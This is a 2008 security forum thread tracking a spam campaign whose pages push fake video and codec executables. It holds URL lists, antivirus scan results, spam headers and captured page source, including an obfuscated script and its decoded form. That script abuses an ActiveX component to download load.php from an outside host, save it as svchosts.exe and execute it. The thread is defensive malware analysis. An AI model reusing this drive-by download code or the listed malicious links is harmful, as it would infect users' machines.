00690 <tr><td>Rating:</td><td><img src="rating5.jpg"></td></tr>
00690 No Error: 200 URL rating5.jpg
00691 </tbody></table>
00692 </td>
00693 </tr>
00694 </tbody></table>
00695
00696 <!-- side thumb 2-->
00697 <table>
00698 <tbody><tr>
00699 <td><a href="video.exe"><img class="side-thumb" src="4957950055.jpg"></a></td>
00699 No Error: 200 URL video.exe <img>
00699 No Error: 200 URL 4957950055.jpg
00700 <td style="color: rgb(119, 119, 119);">
00701 <table>
00702 <tbody><tr class="side-from"><td>From:</td><td><a>SatyrIconIc</a></td></tr>
00703 <tr><td>Length:</td><td><b>5:35</b></td></tr>
00704 <tr><td>View:</td><td><b>1,167,789</b></td></tr>
00705 <tr><td>Rating:</td><td><img src="rating5.jpg"></td></tr>
00705 No Error: 200 URL rating5.jpg
00706 </tbody></table>
00707 </td>
00708 </tr>
00709 </tbody></table>
00710
00711 <!-- side thumb 1-->
00712 <table>
00713 <tbody><tr>
00714 <td><a href="video.exe"><img class="side-thumb" src="3709569718.jpg"></a></td>
00714 No Error: 200 URL video.exe <img>
00714 No Error: 200 URL 3709569718.jpg
00715 <td style="color: rgb(119, 119, 119);">
00716 <table>
00717 <tbody><tr class="side-from"><td>From:</td><td><a>joetelo</a></td></tr>
00718 <tr><td>Length:</td><td><b>15:30</b></td></tr>
00719 <tr><td>View:</td><td><b>778,526</b></td></tr>
00720 <tr><td>Rating:</td><td><img src="rating4.jpg"></td></tr>
00720 No Error: 200 URL rating4.jpg
00721 </tbody></table>
00722 </td>
00723 </tr>
00724 </tbody></table>
00725
00726 <!-- side thumb 1-->
00727 <table>
00728 <tbody><tr>
00729 <td><a href="video.exe"><img class="side-thumb" src="1693018480.jpg"></a></td>
00729 No Error: 200 URL video.exe <img>
00729 No Error: 200 URL 1693018480.jpg
00730 <td style="color: rgb(119, 119, 119);">
00731 <table>
00732 <tbody><tr class="side-from"><td>From:</td><td><a>Jizzpower</a></td></tr>
00733 <tr><td>Length:</td><td><b>9:31</b></td></tr>
00734 <tr><td>View:</td><td><b>583,895</b></td></tr>
00735 <tr><td>Rating:</td><td><img src="rating5.jpg"></td></tr>
00735 No Error: 200 URL rating5.jpg
00736 </tbody></table>
00737 </td>
00738 </tr>
00739 </tbody></table>
00740
00741 <!-- side thumb 1-->
00742 <table>
00743 <tbody><tr>
00744 <td><a href="video.exe"><img class="side-thumb" src="3396659987.jpg"></a></td>
00744 No Error: 200 URL video.exe <img>
00744 No Error: 200 URL 3396659987.jpg
00745 <td style="color: rgb(119, 119, 119);">
00746 <table>
00747 <tbody><tr class="side-from"><td>From:</td><td><a>nj201</a></td></tr>
00748 <tr><td>Length:</td><td><b>13:18</b></td></tr>
00749 <tr><td>View:</td><td><b>467,116</b></td></tr>
00750 <tr><td>Rating:</td><td><img src="rating4.jpg"></td></tr>
00750 No Error: 200 URL rating4.jpg
00751 </tbody></table>
00752 </td>
00753 </tr>
00754 </tbody></table>
00755
00756 <!-- side thumb 1-->
00757 <table>
00758 <tbody><tr>
00759 <td><a href="video.exe"><img class="side-thumb" src="5890990761.jpg"></a></td>
00759 No Error: 200 URL video.exe <img>
00759 No Error: 200 URL 5890990761.jpg
00760 <td style="color: rgb(119, 119, 119);">
00761 <table>
00762 <tbody><tr class="side-from"><td>From:</td><td><a>tmoney42000</a></td></tr>
00763 <tr><td>Length:</td><td><b>12:35</b></td></tr>
00764 <tr><td>View:</td><td><b>389,263</b></td></tr>
00765 <tr><td>Rating:</td><td><img src="rating5.jpg"></td></tr>
00765 No Error: 200 URL rating5.jpg
00766 </tbody></table>
00767 </td>
00768 </tr>
00769 </tbody></table>
00770 </div>
00771 </td>
00772 </tr>
00773 </tbody></table>
00774
00775
00776 </div>
00777
00778 <script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script><noscript><div
00778 No Error: 200 URL http://www.statcounter.com/counter/counter_xhtml.js <Script>
00778 No Error: 200 URL http://www.statcounter.com/counter/counter_xhtml.js js:
00779 class="statcounter"><a href="http://www.statcounter.com/" target="_blank"><img class="statcounter"
00779 No Error: 200 URL http://www.statcounter.com/ <img>
00780 src="http://c41.statcounter.com/3777076/0/dd0c06c0/1/" alt="free tracking" ></a></div></noscript>
00780 No Error: 200 URL http://c41.statcounter.com/3777076/0/dd0c06c0/1/ free tracking [Redir: http://c41.statcounter.com/counter.php?sc_project=3777076&java=0&security=dd0c06c0&invisible=1]
00781 <!-- End of StatCounter Code -->
00782
00783
00784 </body></html>


File r.html(r-thing) :D received on 07.07.2008 22:33:28 (CET)

AhnLab-V3   2008.7.8.0   2008.07.07   -
AntiVir   7.8.0.64   2008.07.07   HEUR/HTML.Malware
Authentium   5.1.0.4   2008.07.06   -
Avast   4.8.1195.0   2008.07.07   -
AVG   7.5.0.516   2008.07.07   -
BitDefender   7.2   2008.07.07   Trojan.HTML.Zlob.Y
CAT-QuickHeal   9.50   2008.07.07   HTM/Zlob.GEN.2
ClamAV   0.93.1   2008.07.07   -
DrWeb   4.44.0.09170   2008.07.07   -
eSafe   7.0.17.0   2008.07.07   -
eTrust-Vet   31.6.5934   2008.07.07   -
Ewido   4.0   2008.07.07   -
F-Prot   4.4.4.56   2008.07.06   -
F-Secure   7.60.13501.0   2008.07.03   -
Fortinet   3.14.0.0   2008.07.07   JS/Zlob!tr.dldr
GData   2.0.7306.1023   2008.07.07   -
Ikarus   T3.1.1.26.0   2008.07.07   -
Kaspersky   7.0.0.125   2008.07.07   -
McAfee   5333   2008.07.07   -
Microsoft   1.3704   2008.07.07   -
NOD32v2   3248   2008.07.07   -
Norman   5.80.02   2008.07.07   -
Panda   9.0.0.4   2008.07.07   -
Prevx1   V2   2008.07.07   -
Rising   20.51.60.00   2008.07.06   -
Sophos   4.31.0   2008.07.07   -
Sunbelt   3.1.1509.1   2008.07.04   -
Symantec   10   2008.07.07   -
TheHacker   6.2.96.374   2008.07.07   -
TrendMicro   8.700.0.1004   2008.07.07   -
VBA32   3.12.6.8   2008.07.07   Trojan-Downloader.VBS.Small.cw
VirusBuster   4.5.11.0   2008.07.07   -
Webwasher-Gateway   6.6.2   2008.07.07   Heuristic.HTML.Malware
Additional information
File size: 34783 bytes
MD5...: da9ce179b1f6d331538a689d9da268a5
SHA1..: 046ab9fd35d73eaaf931cb31e61a50e1bb75ccc4
SHA256: daa27c5408660ddadf4d7f10d9bc682955ccf1c0ac06cc8f433b59c47053045b
SHA512: 1e41d74353abf54f979c082438ff92cb288349bdde47ca40da71778290e0c2a6<br>0e1c7e798b0e2e64b0b70b082808d71810fa7d88df73c331987ce6945a931ad1
PEiD..: -
PEInfo: -


Another?
xww.alpet.hu/r.html
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 01:09:07 am
Been receiving a ton of these myself .......
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 01:56:09 am
Just quickly modified my Outlook Export application to export just the links from e-mails in a specific folder, and the attached are the links from the e-mails pertaining to this, that I've received thus far.
Title: Re: R-thing
Post by: bobby on July 08, 2008, 03:26:35 am
Indeed an annoying thing.

Code: [Select]
http://www.veranstaltungsstaende.de/r.html
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 03:32:05 am
Just had two more myself;

http://choicetitle.net/r.html
http://chromet.com/r.html
Title: Re: R-thing
Post by: CM_MWR on July 08, 2008, 05:54:30 am
Whats the deal,it has specifics to how it is launched?

I assume,popping the link into IE just isnt enough?
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 07:31:41 am
One Two* more

passionmotors.it/r.html
mynexus.nl/r.html

Indeed, popping the link into IE is enough, but some of us like keeping track ;) (I assume you meant "whats the deal" with reference to my posting the list?)
Title: Re: R-thing
Post by: CM_MWR on July 08, 2008, 08:21:46 am
LOL...no,Im not allways a Richard Cranium...only when heavily medicated.

I meant to say:

Why wont this stupid thing launch from IE for me...argh!!!!!!

I tried all 4 of bobbys original links and couldnt get squat to load.

Sorry for the confusion,partner.  ;)
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 08:55:04 am
hehe no worries :)
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 09:07:13 am
boeckinggmbh.de/r.html
mynexus.nl/r.html
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 09:39:41 am
confitech.com.co/r.html
culturatuningdelsur.com.ar/r.html
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 09:56:58 am
www.leuropaeilmediterraneo.it/r.html
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 12:05:02 pm
www.moeterssc.de/r.html
dr-vorwerk.de/r.html
boeckinggmbh.de/r.html
testing.vuenosairez.com/r.html
apsisresource.com/r.html
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 02:23:07 pm
govdeli.com/r.html
mhcrombe.axeweb.be/r.html
pulsar.to.it/r.html
metalurgicajamara.com.br/r.html
banyandecor.com/r.html
gilbertodesouza.com.br/r.html
Title: Re: R-thing
Post by: sowhat-x on July 08, 2008, 03:28:32 pm
Hmmm...Google seems to return quite a lot of results for ".com/r.html",".net/html" etc...
Stumbled upon this blog while searching around - some nice info there:
http://seo.mhvt.net/blog/
Title: Re: R-thing
Post by: MysteryFCM on July 08, 2008, 04:25:09 pm
This one has interestingly, switched to direct IP;

216.73.119.74/r.html

IP PTR: 216-73-119-74.ocdc-01.net
Title: Re: R-thing
Post by: sursmurf on July 11, 2008, 12:02:54 pm
Code: [Select]
http://sourdata.com/r.html
http://nepremicninebios.si/r.html
Title: Re: R-thing
Post by: JohnC on July 11, 2008, 10:33:27 pm
Thanks.
Title: Re: R-thing
Post by: MysteryFCM on July 14, 2008, 11:32:05 pm
Switched to main.html they have;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://orthopaedie-kronberg.de/main.html
Server IP: 81.169.145.68 [ w04.rzone.de ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 15 July 2008
Time: 00:31:14:31
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=view.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="view.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>
<a href="view.exe" style="font-weight:bold;">Download Video</a>

</div>
</body>
</html>
Title: Re: R-thing
Post by: MysteryFCM on July 14, 2008, 11:42:01 pm
Complete list of those I've received thus far ......
Title: Re: R-thing
Post by: MysteryFCM on July 15, 2008, 09:47:25 am
Updated
Title: Re: R-thing
Post by: philipp on July 15, 2008, 01:43:09 pm
another:

hxxp://naltros7.com/main.html
Title: Re: R-thing
Post by: JohnC on July 15, 2008, 07:40:27 pm
Thank you.
Title: Re: R-thing
Post by: MysteryFCM on July 15, 2008, 08:19:59 pm
They've switched again;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.zaragozagolfa.es/about.html
Server IP: 82.194.66.173 [ vlc-147.dns-servicios.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 15 July 2008
Time: 21:20:02:20
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>
<a href="watch.exe" style="font-weight:bold;">Download Video</a>

</div>

<!-- Start of StatCounter Code -->
<script type="text/javascript">
sc_project=3777076;
sc_invisible=1;
sc_partition=40;
sc_security="dd0c06c0";
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><div
class="statcounter"><a href="http://www.statcounter.com/free_hit_counter.html" target="_blank"><img
class="statcounter" src="http://c41.statcounter.com/3777076/0/dd0c06c0/1/" alt="hit counter" ></a></div></noscript>
<!-- End of StatCounter Code -->

</body>
</html>
Title: Re: R-thing
Post by: MysteryFCM on July 15, 2008, 09:31:30 pm
Updated list
Title: Re: R-thing
Post by: philipp on July 17, 2008, 10:50:16 am
hxxp://compassestate.com/about.html
Title: Re: R-thing
Post by: philipp on July 17, 2008, 12:09:35 pm
switched to news.html

email source:
Code: [Select]
Return-Path: <emukurup_1995@ryonet.net>
X-Original-To: mail@xxx.de
Delivered-To: mail@xxx.de
X-policyd-weight: DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_SPAMCOP=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_HELO_IP=-2 (check from: .ryonet. - helo: .p5b0f9a37.dip0.t-ipconnect. - helo-domain: .t-ipconnect.)  FROM/MX_MATCHES_NOT_HELO(DOMAIN)=1 <client=91.15.154.55> <helo=p5b0f9a37.dip0.t-ipconnect.de> <from=emukurup_1995@ryonet.net> <to=mail@xxx.de>, rate: -5.5
Received: from p5B0F9A37.dip0.t-ipconnect.de (p5B0F9A37.dip0.t-ipconnect.de [91.15.154.55])
by family.xxx.de (Postfix) with ESMTP id 246169FA009E
for <mail@xxx.de>; Thu, 17 Jul 2008 14:02:34 +0200 (CEST)
To: mail@xxx.de
Subject: Heart transplant kid kills 10, shots himself
From: Kiva <emukurup_1995@ryonet.net>
Content-Type: text/plain; format=flowed; delsp=yes; charset=koi8-r
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Date: Thu, 17 Jul 2008 14:06:18 +0300
Message-ID: <kf.jinnlmsppgbhwj@name-ddyxsi6djk>
User-Agent: Opera Mail/9.50 (Win32)
X-DSPAM-Result: Spam
X-DSPAM-Processed: Thu Jul 17 14:02:44 2008
X-DSPAM-Confidence: 0.8525
X-DSPAM-Probability: 1.0000
X-DSPAM-Signature: 487f34e4178171492418586

Learn how to extend iPhone battery life
http://www.proximma.com/news.html

--
Using Opera's revolutionary e-mail client: http://www.opera.com/mail/


hxxp://www.proximma.com/news.html
Code: [Select]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>

<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>
Title: Re: R-thing
Post by: philipp on July 17, 2008, 12:43:07 pm
hxxp://www.hila-la.co.il/news.html
hxxp://barrenetxea.com/news.html
Title: Re: R-thing
Post by: MysteryFCM on July 17, 2008, 08:13:52 pm
Updated ...
Title: Re: R-thing
Post by: MysteryFCM on July 18, 2008, 07:39:21 am
Changed to index1.php

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.giando.altervista.org/index1.php
Server IP: 66.98.138.46 [ ns18.altervista.org ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 18 July 2008
Time: 08:38:29:38
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://www.giando.altervista.org/document_arch.exe">
<title></title>
</head>

<body>
<iframe src="http://www.giando.altervista.org/pindex.php" style="width:1px; height:1px;"></iframe><br>

<div style="text-align:center; padding-top:100px;">
<img src="wait.gif"><br><br>
<a href="http://www.giando.altervista.org/document_arch.exe" style="font-weight:bold; color:#3A74AB; font-size:18px; font-family:Verdana;">Download Now</a>

</div>
</body>
</html>
Title: Re: R-thing
Post by: MysteryFCM on July 18, 2008, 07:46:41 am
Lovely script at pindex.php;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.giando.altervista.org/pindex.php
Server IP: 66.98.138.46 [ ns18.altervista.org ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 18 July 2008
Time: 08:41:57:41
*****************************************************************
<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>str = "qndy`mh)(:
gtobuhno!qndy`mh)(!z
w`s!doeds!<!enbtldou/bsd`udDmdldou)&nckdbu&(:
doeds/rdu@uushctud)&he&-&doeds&(:
doeds/rdu@uushctud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892@,1&*#1B#*&15G&*#B38#*&D27&(:
usx!z
w`s!`rp!<!doeds/Bsd`udNckdbu)&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:
w`s!`rr!<!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-&&(:
w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&-&&(:
usx!z!`rru/uxqd!<!0:
`rp/nqdo)&F&*#D#*&U&-&iuuq;..vvv/fh`oen/`mudswhru`/nsf..mn`e/qiq&-g`mrd(:
`rp/rdoe)(:!`rru/nqdo)(:
`rru/Vshud)`rp/sdrqnordCnex(:
w`s!hlx`!<!&/..//..rwbinrur/dyd&:
`rru/R`wdUnGhmd)hlx`-3(:
`rru/Bmnrd)(:
|!b`ubi)d(!z|
usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi)d(!z||
b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

Code: [Select]
poexali();
function poexali() {
var ender = document.createElement('object');
ender.setAttribute('id','ender');
ender.setAttribute('classid','c'+'l'+"sid:B"+"D9"+'6C556-65'+"A3-11"+'D0-983A-0'+"0C"+'04F'+"C29"+'E36');
try {
var asq = ender.CreateObject('m'+"sx"+'ml2'+"."+'X'+"ML"+'H'+'TTP','');
var ass = ender.CreateObject("Sh"+"ell.A"+"p"+"plica"+"tion",'');
var asst = ender.CreateObject('a'+'d'+"odb."+'st'+"r"+'eam','');
try { asst.type = 1;
asq.open('G'+"E"+'T','http://www.giando.altervista.org//load.php',false);
asq.send(); asst.open();
asst.Write(asq.responseBody);
var imya = './/..//svchosts.exe';
asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}
try { ass.shellexecute(imya); } catch(e) {}}
catch(e){}}
Title: Re: R-thing
Post by: philipp on July 19, 2008, 12:13:02 pm
switched to hot.html

email source:
Code: [Select]
Return-Path: <Fadi-kroost@providence-hospital.org>
X-Original-To: postmaster@xxx.de
Delivered-To: postmaster@xxx.de
Received: from 159.40.71-86.rev.gaoland.net (159.40.71-86.rev.gaoland.net [86.71.40.159])
by family.xxx.de (Postfix) with ESMTP id 391C64A380D4
for <postmaster@xxx.de>; Sat, 19 Jul 2008 13:39:45 +0200 (CEST)
To: postmaster@xxx.de
Subject: Dark Knight nemesis finally dead
From: Blyakher <Fadi-kroost@providence-hospital.org>
Content-Type: text/plain; format=flowed; delsp=yes; charset=koi8-r
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Date: Sat, 19 Jul 2008 13:39:44 +0200
Message-ID: <zr.bnpscipguetotv@valued-12ef4461>
User-Agent: Opera Mail/9.50 (Win32)
X-Antivirus: avast! (VPS 080718-1, 18/07/2008), Outbound message
X-Antivirus-Status: Clean
X-DSPAM-Result: Spam
X-DSPAM-Processed: Sat Jul 19 13:39:49 2008
X-DSPAM-Confidence: 0.8059
X-DSPAM-Probability: 1.0000
X-DSPAM-Signature: 4881d28554298697011158

Book your cheapest holidays for your winter getaway right here.
http://euromultimarca.com/hot.html

--
Using Opera's revolutionary e-mail client: http://www.opera.com/mail/

hxxp://euromultimarca.com/hot.html
Code: [Select]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>

<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>

md5sum watch.exe: f422a0f9cd67c465a963610e74f50b17
-> still same file.
Title: Re: R-thing
Post by: MysteryFCM on July 19, 2008, 07:46:29 pm
.... and again

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.teethline.com/start.html
Server IP: 195.110.124.188 [ opus.register.it ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 19 July 2008
Time: 20:46:35:46
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>
<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>
Title: Re: R-thing
Post by: MysteryFCM on July 19, 2008, 07:57:42 pm
Updated
Title: Re: R-thing
Post by: philipp on July 19, 2008, 08:16:18 pm
switched to start.html

email source:
Code: [Select]
Return-Path: <resat-tarsiida@northyorks.gov.uk>
X-Original-To: postmaster@xxx.de
Delivered-To: postmaster@xxx.de
Received: from pc-94-48-74-200.cm.vtr.net (pc-94-48-74-200.cm.vtr.net [200.74.48.94])
by family.xxx.de (Postfix) with ESMTP id 155354A380D2
for <postmaster@xxx.de>; Sat, 19 Jul 2008 21:45:35 +0200 (CEST)
To: postmaster@xxx.de
Subject: How to blackmail without getting caught
From: noonan <resat-tarsiida@northyorks.gov.uk>
Content-Type: text/plain; format=flowed; delsp=yes; charset=koi8-r
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Date: Sat, 19 Jul 2008 15:38:29 -0400
Message-ID: <ja.zcyfybbslxpnnh@jers-nhoiiuw9nk>
User-Agent: Opera Mail/9.50 (Win32)
X-DSPAM-Result: Spam
X-DSPAM-Processed: Sat Jul 19 21:45:43 2008
X-DSPAM-Confidence: 0.6941
X-DSPAM-Probability: 1.0000
X-DSPAM-Signature: 48824467222301142080570

Banks that almost went bankrupt with your money
http://tino.bike2sale.com/start.html

--
Using Opera's revolutionary e-mail client: http://www.opera.com/mail/

hxxp://tino.bike2sale.com/start.html
Code: [Select]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>

<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>

same binary as before.

---
edit:
hxxp://www.highpauleberlin.de/start.html
hxxp://parrocchiadelrosario.eu/start.html
hxxp://thebackporchband.com/start.html
hxxp://www.akvnjbp.com/start.html
Title: Re: R-thing
Post by: JohnC on July 20, 2008, 01:25:37 pm
Thanks. :)
Title: Re: R-thing
Post by: philipp on July 20, 2008, 09:31:40 pm
Code: [Select]
http://fotik.fileserver.ixan.net/start.html
Title: Re: R-thing
Post by: MysteryFCM on July 20, 2008, 10:25:45 pm
Latest ....
Title: Re: R-thing
Post by: Kayrac on July 21, 2008, 10:54:42 am
Code: [Select]
www.marbresigranitsmontserrat.com/start.html
http://www.centaurea-ae.org/hot.html
http://www.teatinas.com/news.html
www.eurotakt.sk/news.html
http://agroimpex.com.pl/news.html
nanni.schrod.eu/start.html
sigmasoft.it/start.html
Title: Re: R-thing
Post by: MysteryFCM on July 21, 2008, 04:49:34 pm
They've switched again;

nuovacifet.it/begin.html

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://nuovacifet.it/begin.html
Server IP: 195.110.124.188 [ opus.register.it ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 21 July 2008
Time: 17:50:01:50
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>
<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>
Title: Re: R-thing
Post by: MysteryFCM on July 21, 2008, 11:10:20 pm
They've changed again ..... and more interestingly, seem to have ditched the usual site code in favour of;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://afg.es/viewmovie.html
Server IP: 217.76.130.227 [ lwga149.servidoresdns.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 22 July 2008
Time: 00:09:20:09
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Watch Free Movie</TITLE>
<META content=noindex,nofollow,noarchive name=robots>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=codecinst.exe">
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">


<STYLE>.t {
BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; BORDER-LEFT: #666666 1px solid; BORDER-BOTTOM: #666666 1px solid
}
.b1 {
BORDER-RIGHT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; PADDING-LEFT: 0px; FONT-WEIGHT: bold; FONT-SIZE: 12px; BACKGROUND-IMAGE: url(img5.gif); PADDING-BOTTOM: 0px; MARGIN: 0px; BORDER-LEFT: 0px; WIDTH: 104px; COLOR: #fff; PADDING-TOP: 0px; BORDER-BOTTOM: 0px; BACKGROUND-REPEAT: no-repeat; FONT-FAMILY: Arial; HEIGHT: 23px; BACKGROUND-COLOR: #fff
}
.b11 {
BORDER-RIGHT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; PADDING-LEFT: 0px; FONT-WEIGHT: bold; FONT-SIZE: 12px; BACKGROUND-IMAGE: url(img5.gif); PADDING-BOTTOM: 0px; MARGIN: 0px; BORDER-LEFT: 0px; WIDTH: 104px; COLOR: #fff; PADDING-TOP: 0px; BORDER-BOTTOM: 0px; BACKGROUND-REPEAT: no-repeat; FONT-FAMILY: Arial; HEIGHT: 23px; BACKGROUND-COLOR: #fff; TEXT-DECORATION: underline
}
</STYLE>

<script>
function activex_is_here()
{
    try
    {
        return false;
    }
    catch(e)
    {
        ;
    }

    return false;
}

function releaseMovie() {
if (activex_is_here()) {

}
}function codecDownload()
{
if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
return;
}
else {
window.setTimeout("location.href='codecinst.exe'", 3000);
}
}
</script>
</head>

<body color=black>

<script>

codecDownload();

</script>
<script>


var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;

o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;

o.root = oRoot && oRoot != null ? oRoot : o ;

if (o.hmode  && isNaN(parseInt(o.root.style.left  ))) o.root.style.left   = "0px";
if (o.vmode  && isNaN(parseInt(o.root.style.top   ))) o.root.style.top    = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right  = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;

o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;

o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},

start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);

o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;

if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}

if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}

document.onmousemove = Drag.drag;
